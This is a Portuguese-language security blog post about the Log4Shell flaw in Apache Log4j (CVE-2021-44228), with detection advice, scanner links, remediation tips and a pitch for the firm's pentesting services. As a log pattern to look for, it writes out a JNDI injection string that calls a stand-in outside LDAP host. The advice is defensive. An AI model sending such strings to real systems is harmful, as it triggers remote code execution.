# CYBERBITZ INSIGHT _

Apache Log4J

Log4shell exploit vulnerability

Log4J (CVE-2021-44228) é uma vulnerabilidade e é marcada com a gravidade mais alta (10 de 10). Ele permite que um invasor execute código arbitrário injetando dados controlados pelo invasor em uma mensagem registrada que é amplamente usada e uma função de registro popular. Mesmo que seu software não a utilize, um fornecedor terceirizado ou um componente de seu software pode usar a biblioteca.

Detecção:

Faça você mesmo: já existem scanners de código aberto disponíveis.

Determine o potencial comprometimento: Revise seus logs e procure algo assim: ${jndi:ldap://notyourdomain.com/xxxxxxxx}. Revise os servidores e identifique quaisquer processos que não sejam normais.

https://github.com/fullhunt/log4j-scan https://pythonrepo.com/repo/fullhunt-log4j-scan https://github.com/fullhunt/log4j-scan

Resposta: Nós podemos ajudar Nossa proteção da Web inclui o Log4J em sites externos. Se você precisar de mais, oferecemos pentests externos ou soluções personalizadas para ajudar a verificar e detectar essas vulnerabilidades de todos os seus sistemas externos e/ou internos.

Não hesite em nos contatar agora antes que os antiéticos hackers o encontrem. Nossos testes de intrusão identificam a exposição a vulnerabilidades de dia zero, configurações incorretas e processos inadequados de gerenciamento de patches.

O que você pode fazer? É altamente recomendável atualizar a biblioteca ou removê-la de sistemas que não são necessários. Existem outros métodos para auxiliar na correção, dependendo da versão. Revise nossas referências para entender melhor a vulnerabilidade e como corrigi-la em seu ambiente.

Referências

https://blog.shodanhdb.com/log4j-vulnerability https://claroty.com/2021/12/14/blog-research-what-you-need-to-know-about-the-log4j-zero-day-vulnerability/ https://jfrog.com/blog/log4shell-0-day-vulnerability-all-you-need-to-know/ https://www.techspot.com/news/92633-hackers-launch-over-840000-attacks-through-log4j-flaw.html

Post Url: apache-log4j-cve-2021-44228

Emergência?

Malware, ransomware ou outras cyber emergências, entre em contato imediatamente.

Brasil ShieldsUp Alertas

Alertas Importantes que requerem atenção imediata e que estão sendo explorados ativamente

Insights

No nosso Insights blog, você pode obter informações valiosas para melhor proteger sua empresa